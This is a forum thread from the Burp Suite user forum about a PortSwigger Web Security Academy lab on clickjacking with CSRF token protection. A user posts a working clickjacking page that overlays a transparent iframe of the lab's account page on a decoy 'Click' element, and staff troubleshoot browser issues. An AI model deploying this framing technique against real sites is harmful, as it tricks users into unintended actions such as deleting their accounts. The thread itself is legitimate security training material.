The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Basic clickjacking with CSRF token protection

Jean-Maurice | Last updated: Jun 17, 2024 07:43AM UTC

I'm having trouble with this lab. When I click on 'View exploit' I have the login page coming up, of course with no 'delete' button. I'm using Burp's browser (Chromium) and here's my script; of course I'm changing the lab ID and keeping the 'https://':

    <style>
        iframe {
            position: relative;
            width: 1000px;
            height: 1000px;
            opacity: 0.5;
            z-index: 2;
        }
        div {
            position: absolute;
            top: 470px;
            left: 70px;
            z-index: 1;
        }
    </style>
    <div>Click</div>
    <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

I also tried with /my-account?id=wiener, for the same result. What am I doing wrong? Thanks

Ben, PortSwigger Agent | Last updated: Jun 19, 2024 05:00AM UTC

Hi Jean-Maurice, There is currently an issue with using the Clickjacking labs in conjunction with Burp's embedded browser. You should, however, still be able to use a standard version of Chrome and get these labs to work - if you try a standard version of Chrome, alongside the written solution (adapted with the specific values required for your elements to line up), does this then allow you to solve this lab?

Jack | Last updated: Jul 17, 2024 07:40PM UTC

Hi, when can you fix this? It does not work with any of the browsers. Maybe accepting the solutions could be more dynamic for these labs because nothing works (Chrome, Burp browser, Opera, Edge, Firefox, NOTHING)

Ben, PortSwigger Agent | Last updated: Jul 18, 2024 08:02AM UTC

Hi, Again, having run through this lab using a standard version of Chrome (version 126.0.6478.127), this lab still works with the written solution.

RM | Last updated: Sep 30, 2024 07:14AM UTC